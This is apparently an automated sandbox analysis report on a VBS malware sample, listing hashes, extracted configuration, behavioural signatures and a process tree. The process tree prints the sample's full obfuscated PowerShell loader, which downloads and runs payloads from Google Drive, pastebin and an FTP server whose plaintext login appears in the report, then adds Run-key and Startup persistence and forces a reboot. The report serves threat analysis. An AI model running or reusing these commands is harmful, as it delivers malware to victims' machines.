Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 11:09
Static task
static1
Behavioral task
behavioral1
Sample
cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs
Resource
win10v2004-20240704-en
General
-
Target
cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs
-
Size
703KB
-
MD5
f1b75f0121271d4e6f174d28e3821244
-
SHA1
4d3ece676f79050cfa65c539edf6c34b29d82038
-
SHA256
cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761
-
SHA512
3ae88843320ef8cc73b311c84fc0158a439e83bf08c612a6757cc2c1ae9ffd9d091400a3ac354abeff3f6274222ef995bf5d4a57f74d084790313105a24d6437
-
SSDEEP
1536:oeeeeeeeeeeeeeeeeeeeeeee5WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWC:i
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat - Password:
159753Jp*
Signatures
-
Blocklisted process makes network request 27 IoCs
flow pid Process 9 4552 powershell.exe 13 4552 powershell.exe 15 4552 powershell.exe 18 4552 powershell.exe 20 4552 powershell.exe 23 4552 powershell.exe 24 4552 powershell.exe 25 4552 powershell.exe 29 4552 powershell.exe 40 4552 powershell.exe 41 4552 powershell.exe 42 4552 powershell.exe 43 4552 powershell.exe 48 4552 powershell.exe 49 4552 powershell.exe 50 4552 powershell.exe 51 4552 powershell.exe 52 4552 powershell.exe 59 4552 powershell.exe 60 4552 powershell.exe 61 4552 powershell.exe 62 4552 powershell.exe 63 4552 powershell.exe 64 4552 powershell.exe 65 4552 powershell.exe 66 4552 powershell.exe 67 4552 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2753856825-3907105642-1818461144-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2753856825-3907105642-1818461144-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_o = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft SyS\\zmjqf.ps1' \";exit" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 pastebin.com 18 pastebin.com -
pid Process 3704 powershell.exe 4552 powershell.exe 2788 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3704 powershell.exe 3704 powershell.exe 4552 powershell.exe 4552 powershell.exe 4552 powershell.exe 2788 powershell.exe 2788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3704 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4948 wrote to memory of 3704 4948 WScript.exe 82 PID 4948 wrote to memory of 3704 4948 WScript.exe 82 PID 3704 wrote to memory of 4552 3704 powershell.exe 84 PID 3704 wrote to memory of 4552 3704 powershell.exe 84 PID 4552 wrote to memory of 3028 4552 powershell.exe 88 PID 4552 wrote to memory of 3028 4552 powershell.exe 88 PID 4552 wrote to memory of 2788 4552 powershell.exe 89 PID 4552 wrote to memory of 2788 4552 powershell.exe 89 PID 4552 wrote to memory of 2208 4552 powershell.exe 90 PID 4552 wrote to memory of 2208 4552 powershell.exe 90 PID 4552 wrote to memory of 1200 4552 powershell.exe 91 PID 4552 wrote to memory of 1200 4552 powershell.exe 91 PID 4552 wrote to memory of 2356 4552 powershell.exe 92 PID 4552 wrote to memory of 2356 4552 powershell.exe 92 PID 4552 wrote to memory of 4704 4552 powershell.exe 93 PID 4552 wrote to memory of 4704 4552 powershell.exe 93 PID 4552 wrote to memory of 1664 4552 powershell.exe 94 PID 4552 wrote to memory of 1664 4552 powershell.exe 94 PID 4552 wrote to memory of 1888 4552 powershell.exe 95 PID 4552 wrote to memory of 1888 4552 powershell.exe 95 PID 4552 wrote to memory of 4612 4552 powershell.exe 96 PID 4552 wrote to memory of 4612 4552 powershell.exe 96 PID 4552 wrote to memory of 2432 4552 powershell.exe 97 PID 4552 wrote to memory of 2432 4552 powershell.exe 97 PID 4552 wrote to memory of 4732 4552 powershell.exe 100 PID 4552 wrote to memory of 4732 4552 powershell.exe 100 PID 4552 wrote to memory of 3980 4552 powershell.exe 101 PID 4552 wrote to memory of 3980 4552 powershell.exe 101 PID 4552 wrote to memory of 2248 4552 powershell.exe 102 PID 4552 wrote to memory of 2248 4552 powershell.exe 102 PID 4552 wrote to memory of 4676 4552 powershell.exe 103 PID 4552 wrote to memory of 4676 4552 powershell.exe 103 PID 4552 wrote to memory of 2276 4552 powershell.exe 106 PID 4552 wrote to memory of 2276 4552 powershell.exe 106 PID 4552 wrote to memory of 4012 4552 powershell.exe 107 PID 4552 wrote to memory of 4012 4552 powershell.exe 107 PID 4552 wrote to memory of 1128 4552 powershell.exe 108 PID 4552 wrote to memory of 1128 4552 powershell.exe 108 PID 4552 wrote to memory of 1892 4552 powershell.exe 109 PID 4552 wrote to memory of 1892 4552 powershell.exe 109 PID 4552 wrote to memory of 3584 4552 powershell.exe 110 PID 4552 wrote to memory of 3584 4552 powershell.exe 110 PID 4552 wrote to memory of 2892 4552 powershell.exe 111 PID 4552 wrote to memory of 2892 4552 powershell.exe 111 PID 4552 wrote to memory of 4992 4552 powershell.exe 112 PID 4552 wrote to memory of 4992 4552 powershell.exe 112 PID 4552 wrote to memory of 3668 4552 powershell.exe 113 PID 4552 wrote to memory of 3668 4552 powershell.exe 113 PID 4552 wrote to memory of 2400 4552 powershell.exe 114 PID 4552 wrote to memory of 2400 4552 powershell.exe 114 PID 4552 wrote to memory of 3752 4552 powershell.exe 115 PID 4552 wrote to memory of 3752 4552 powershell.exe 115 PID 4552 wrote to memory of 2672 4552 powershell.exe 116 PID 4552 wrote to memory of 2672 4552 powershell.exe 116 PID 4552 wrote to memory of 3232 4552 powershell.exe 117 PID 4552 wrote to memory of 3232 4552 powershell.exe 117 PID 4552 wrote to memory of 4116 4552 powershell.exe 118 PID 4552 wrote to memory of 4116 4552 powershell.exe 118 PID 4552 wrote to memory of 3956 4552 powershell.exe 119 PID 4552 wrote to memory of 3956 4552 powershell.exe 119 PID 4552 wrote to memory of 2816 4552 powershell.exe 120 PID 4552 wrote to memory of 2816 4552 powershell.exe 120 PID 4552 wrote to memory of 3292 4552 powershell.exe 121 PID 4552 wrote to memory of 3292 4552 powershell.exe 121
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$tEIHp = 'Ow℻_レ9ADsAKQAgACkAIAAnADEAZQ℻_レ1AHIAdAAnACAALAAgAHYATw℻_レhAFoARwAkACAALAAgACcAaA℻_レ0AHQAcA℻_レzADoALwAvAHMAaA℻_レhAHIAZQ℻_レ0AGUAeA℻_レ0AC4AbQ℻_レlAC8Acg℻_レhAHcALw℻_レvAGsAcw℻_レ2ADgAZA℻_レtAHUANA℻_レ2ACcAIAAoACAAXQ℻_レdAFsAdA℻_レjAGUAag℻_レiAG8AWwAgACwAIA℻_レsAGwAdQ℻_レuACQAIAAoAGUAaw℻_レvAHYAbg℻_レJAC4AKQAgACcASQ℻_レWAEYAcg℻_レwACcAIAAoAGQAbw℻_レoAHQAZQ℻_レNAHQAZQ℻_レHAC4AKQAnADEAcw℻_レzAGEAbA℻_レDAC4AMw℻_レ5AHIAYQ℻_レyAGIAaQ℻_レMAHMAcw℻_レhAGwAQwAnACgAZQ℻_レwAHkAVA℻_レ0AGUARwAuACkAIA℻_レ4AG0Aeg℻_レYAHgAJAAgACgAZA℻_レhAG8ATAAuAG4AaQ℻_レhAG0Abw℻_レEAHQAbg℻_レlAHIAcg℻_レ1AEMAOgA6AF0Abg℻_レpAGEAbQ℻_レvAEQAcA℻_レwAEEALg℻_レtAGUAdA℻_レzAHkAUw℻_レbADsAKQAgACkAIAAnAEEAJwAgACwAIAAnAJMhOgCTIScAIAAoAGUAYw℻_レhAGwAcA℻_レlAFIALg℻_レUAHQAQg℻_レCAFEAJAAgACgAZw℻_レuAGkAcg℻_レ0AFMANAA2AGUAcw℻_レhAEIAbQ℻_レvAHIARgA6ADoAXQ℻_レ0AHIAZQ℻_レ2AG4Abw℻_レDAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レ4AG0Aeg℻_レYAHgAJAAgAF0AXQ℻_レbAGUAdA℻_レ5AEIAWwA7ACcAJQ℻_レJAGgAcQ℻_レSAFgAJQAnACAAPQAgAHYATw℻_レhAFoARwAkADsAKQAgAFQAZA℻_レTAFUAWgAkACAAKA℻_レnAG4AaQ℻_レyAHQAUw℻_レkAGEAbw℻_レsAG4Adw℻_レvAEQALg℻_レUAHQAQg℻_レCAFEAJAAgAD0AIA℻_レUAHQAQg℻_レCAFEAJAA7ADgARg℻_レUAFUAOgA6AF0AZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AdA℻_レ4AGUAVAAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAIAA9ACAAZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AVA℻_レ0AEIAQg℻_レRACQAOwApAHQAbg℻_レlAGkAbA℻_レDAGIAZQ℻_レXAC4AdA℻_レlAE4AIA℻_レ0AGMAZQ℻_レqAGIATwAtAHcAZQ℻_レOACgAIAA9ACAAVA℻_レ0AEIAQg℻_レRACQAOwApACgAZQ℻_レzAG8AcA℻_レzAGkAZAAuAFQAdA℻_レCAEIAUQAkADsAKQAgACcAdA℻_レ4AHQALgAxADAATA℻_レMAEQALwAxADAALw℻_レyAGUAdA℻_レwAHkAcg℻_レjAHAAVQAvAHIAYgAuAG0Abw℻_レjAC4AdA℻_レhAHIAYg℻_レ2AGsAYw℻_レzAGUAZAAvAHIAYgAuAG0Abw℻_レjAC4AdA℻_レhAHIAYg℻_レ2AGsAYw℻_レzAGUAZAAuAHAAdA℻_レmAC8ALwA6AHAAdA℻_レmACcAIAAoAGcAbg℻_レpAHIAdA℻_レTAGQAYQ℻_レvAGwAbg℻_レ3AG8ARAAuAFQAdA℻_レCAEIAUQAkACAAPQAgAFQAZA℻_レTAFUAWgAkADsAKQAnACoAcA℻_レKADMANQA3ADkANQAxACcALAAnAHQAYQ℻_レyAGIAdg℻_レrAGMAcw℻_レlAGQAJwAoAGwAYQ℻_レpAHQAbg℻_レlAGQAZQ℻_レyAEMAaw℻_レyAG8Adw℻_レ0AGUATgAuAHQAZQ℻_レOAC4AbQ℻_レlAHQAcw℻_レ5AFMAIA℻_レ0AGMAZQ℻_レqAGIAbwAtAHcAZQ℻_レuACAAPQAgAHMAbA℻_レhAGkAdA℻_レuAGUAZA℻_レlAHIAQwAuAFQAdA℻_レCAEIAUQAkADsAOA℻_レGAFQAVQA6ADoAXQ℻_レnAG4AaQ℻_レkAG8AYw℻_レuAEUALg℻_レ0AHgAZQ℻_レUAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レnAG4AaQ℻_レkAG8AYw℻_レuAEUALg℻_レUAHQAQg℻_レCAFEAJAA7ACkAdA℻_レuAGUAaQ℻_レsAEMAYg℻_レlAFcALg℻_レ0AGUATgAgAHQAYw℻_レlAGoAYg℻_レPAC0Adw℻_レlAE4AKAAgAD0AIA℻_レUAHQAQg℻_レCAFEAJAA7AFQAZA℻_レTAFUAWgAkADsAMgAxAHMAbA℻_レUADoAOg℻_レdAGUAcA℻_レ5AFQAbA℻_レvAGMAbw℻_レ0AG8Acg℻_レQAHkAdA℻_レpAHIAdQ℻_レjAGUAUwAuAHQAZQ℻_レOAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レsAG8AYw℻_レvAHQAbw℻_レyAFAAeQ℻_レ0AGkAcg℻_レ1AGMAZQ℻_レTADoAOg℻_レdAHIAZQ℻_レnAGEAbg℻_レhAE0AdA℻_レuAGkAbw℻_レQAGUAYw℻_レpAHYAcg℻_レlAFMALg℻_レ0AGUATgAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAOw℻_レ9AGUAdQ℻_レyAHQAJA℻_レ7ACAAPQAgAGsAYw℻_レhAGIAbA℻_レsAGEAQw℻_レuAG8AaQ℻_レ0AGEAZA℻_レpAGwAYQ℻_レWAGUAdA℻_レhAGMAaQ℻_レmAGkAdA℻_レyAGUAQw℻_レyAGUAdg℻_レyAGUAUwA6ADoAXQ℻_レyAGUAZw℻_レhAG4AYQ℻_レNAHQAbg℻_レpAG8AUA℻_レlAGMAaQ℻_レ2AHIAZQ℻_レTAC4AdA℻_レlAE4ALg℻_レtAGUAdA℻_レzAHkAUw℻_レbAHsAIA℻_レlAHMAbA℻_レlAH0AIA℻_レmAC8AIAAwACAAdAAvACAAcgAvACAAZQ℻_レ4AGUALg℻_レuAHcAbw℻_レkAHQAdQ℻_レoAHMAIAA7ACcAMAA4ADEAIA℻_レwAGUAZQ℻_レsAHMAJwAgAGQAbg℻_レhAG0AbQ℻_レvAGMALQAgAGUAeA℻_レlAC4AbA℻_レsAGUAaA℻_レzAHIAZQ℻_レ3AG8AcAA7ACAAZQ℻_レjAHIAbw℻_レmAC0AIAApACAAJw℻_レwAHUAdA℻_レyAGEAdA℻_レTAFwAcw℻_レtAGEAcg℻_レnAG8Acg℻_レQAFwAdQ℻_レuAGUATQAgAHQAcg℻_レhAHQAUw℻_レcAHMAdw℻_レvAGQAbg℻_レpAFcAXA℻_レ0AGYAbw℻_レzAG8Acg℻_レjAGkATQ℻_レcAGcAbg℻_レpAG0AYQ℻_レvAFIAXA℻_レhAHQAYQ℻_レEAHAAcA℻_レ℻_レAFwAJwAgACsAIA℻_レwAHUAdA℻_レyAGEAdA℻_レTAGQAbA℻_レvAEYAJAAgACgAIA℻_レuAG8AaQ℻_レ0AGEAbg℻_レpAHQAcw℻_レlAEQALQAgACcAJQ℻_レJAGgAcQ℻_レSAFgAJQAnACAAbQ℻_レlAHQASQAtAHkAcA℻_レvAEMAIAA7ACAAdA℻_レyAGEAdA℻_レzAGUAcg℻_レvAG4ALwAgAHQAZQ℻_レpAHUAcQAvACAAZQ℻_レsAGkAZgAkACAAZQ℻_レ4AGUALg℻_レhAHMAdQ℻_レ3ACAAZQ℻_レ4AGUALg℻_レsAGwAZQ℻_レoAHMAcg℻_レlAHcAbw℻_レwACAAOwApACcAdQ℻_レzAG0ALg℻_レuAGkAdw℻_レwAFUAXAAnACAAKwAgAGEAdA℻_レzAGEAcAAkACgAIAA9ACAAZQ℻_レsAGkAZgAkADsAKQAgAGUAbQ℻_レhAE4Acg℻_レlAHMAVQA6ADoAXQ℻_レ0AG4AZQ℻_レtAG4Abw℻_レyAGkAdg℻_レuAEUAWwAgACsAIAAnAFwAcw℻_レyAGUAcw℻_レVAFwAOg℻_レDACcAKAAgAD0AIA℻_レwAHUAdA℻_レyAGEAdA℻_レTAGQAbA℻_レvAEYAJAA7ACkAJw℻_レ1AHMAbQAuAG4AaQ℻_レ3AHAAVQ℻_レcACcAIAArACAAYQ℻_レ0AHMAYQ℻_レwACQAIAAsAEIASw℻_レMAFIAVQAkACgAZQ℻_レsAGkARg℻_レkAGEAbw℻_レsAG4Adw℻_レvAEQALg℻_レhAGkAUg℻_レDAE8AJAA7ADgARg℻_レUAFUAOgA6AF0AZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AdA℻_レ4AGUAVAAuAG0AZQ℻_レ0AHMAeQ℻_レTAFsAIAA9ACAAZw℻_レuAGkAZA℻_レvAGMAbg℻_レFAC4AYQ℻_レpAFIAQw℻_レPACQAOwApAHQAbg℻_レlAGkAbA℻_レDAGIAZQ℻_レXAC4AdA℻_レlAE4AIA℻_レ0AGMAZQ℻_レqAGIATwAtAHcAZQ℻_レOACgAIAA9ACAAYQ℻_レpAFIAQw℻_レPACQAOw℻_レ9ADsAIAApACcAcg℻_レnADgARAA3AG8AUg℻_レzAGYAVg℻_レjAHIAMg℻_レuAEEAaA℻_レmAGgAVgA2AEQAQw℻_レ4AFIAcQ℻_レuAHEAagA1AGoAcg℻_レiADEAJwAgACsAIA℻_レCAEsATA℻_レSAFUAJAAoACAAPQAgAEIASw℻_レMAFIAVQAkAHsAIA℻_レlAHMAbA℻_レlAH0AOwAgACkAJw℻_レ4ADQAZg℻_レoAFoATQ℻_レ3AE4ANw℻_レVAGUAXwAwAF8ANQ℻_レfAGkAYw℻_レzAGIAaAA3AEMAUAAwAEkAZg℻_レQAGQAQQAyADEAMQAnACAAKwAgAEIASw℻_レMAFIAVQAkACgAIAA9ACAAQg℻_レLAEwAUg℻_レVACQAewAgACkAcg℻_レlAFYAbg℻_レpAFcAJAAoACAAZg℻_レpADsAIAApACcANAA2ACcAKA℻_レzAG4AaQ℻_レhAHQAbg℻_レvAEMALg℻_レFAFIAVQ℻_レUAEMARQ℻_レUAEkASA℻_レDAFIAQQ℻_レfAFIATw℻_レTAFMARQ℻_レDAE8AUg℻_レQADoAdg℻_レuAGUAJAAgAD0AIA℻_レyAGUAVg℻_レuAGkAVwAkADsAJwA9AGQAaQAmAGQAYQ℻_レvAGwAbg℻_レ3AG8AZAA9AHQAcg℻_レvAHAAeA℻_レlAD8AYw℻_レ1AC8AbQ℻_レvAGMALg℻_レlAGwAZw℻_レvAG8AZwAuAGUAdg℻_レpAHIAZAAvAC8AOg℻_レzAHAAdA℻_レ0AGgAJwAgAD0AIA℻_レCAEsATA℻_レSAFUAJAA7ACkAJw℻_レ1AHMAbQAuAG4AaQ℻_レ3AHAAVQ℻_レcACcAIAArACAAYQ℻_レ0AHMAYQ℻_レwACQAKAAgAGwAZQ℻_レkADsAKQAoAGgAdA℻_レhAFAAcA℻_レtAGUAVA℻_レ0AGUARwA6ADoAXQ℻_レoAHQAYQ℻_レQAC4ATw℻_レJAC4AbQ℻_レlAHQAcw℻_レ5AFMAWwAgAD0AIA℻_レhAHQAcw℻_レhAHAAJA℻_レ7ACAAKQ℻_レyAGUAdw℻_レvAHAAcg℻_レlAFYAJAAoACAAZg℻_レpADsAIAApADIAKA℻_レzAGwAYQ℻_レ1AHEARQAuAHIAbw℻_レqAGEATQAuAG4Abw℻_レpAHMAcg℻_レlAFYALg℻_レ0AHMAbw℻_レoACQAIAA9ACAAcg℻_レlAHcAbw℻_レwAHIAZQ℻_レWACQAIAA7AA==';$mGvNv = $tEIHp.replace('℻_レ' , 'B') ;$xBEkr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $mGvNv ) ); $xBEkr = $xBEkr[-1..-$xBEkr.Length] -join '';$xBEkr = $xBEkr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs');powershell $xBEkr2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Verpower = $host.Version.Major.Equals(2) ;if ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$URLKB = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($WinVer) {$URLKB = ($URLKB + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$URLKB = ($URLKB + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$OCRia = (New-Object Net.WebClient);$OCRia.Encoding = [System.Text.Encoding]::UTF8;$OCRia.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$ZUSdT;$QBBtT = (New-Object Net.WebClient);$QBBtT.Encoding = [System.Text.Encoding]::UTF8;$QBBtT.Credentials = new-object System.Net.NetworkCredential('desckvbrat','159753Jp*');$ZUSdT = $QBBtT.DownloadString( 'ftp://ftp.desckvbrat.com.br/desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$QBBtT.dispose();$QBBtT = (New-Object Net.WebClient);$QBBtT.Encoding = [System.Text.Encoding]::UTF8;$QBBtT = $QBBtT.DownloadString( $ZUSdT );$GZaOv = 'C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $QBBtT.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'v4umd8vsko/war/em.txeterahs//:sptth' , $GZaOv , 'true1' ) );};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft SyS\"4⤵PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft SyS\\x2.ps1"4⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵
- Drops startup file
PID:2208
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:1200
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵
- Drops startup file
PID:2356
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4704
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵
- Drops startup file
PID:1664
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:1888
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4612
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2432
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4732
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3980
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2248
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4676
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2276
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4012
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:1128
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:1892
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3584
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2892
-
-
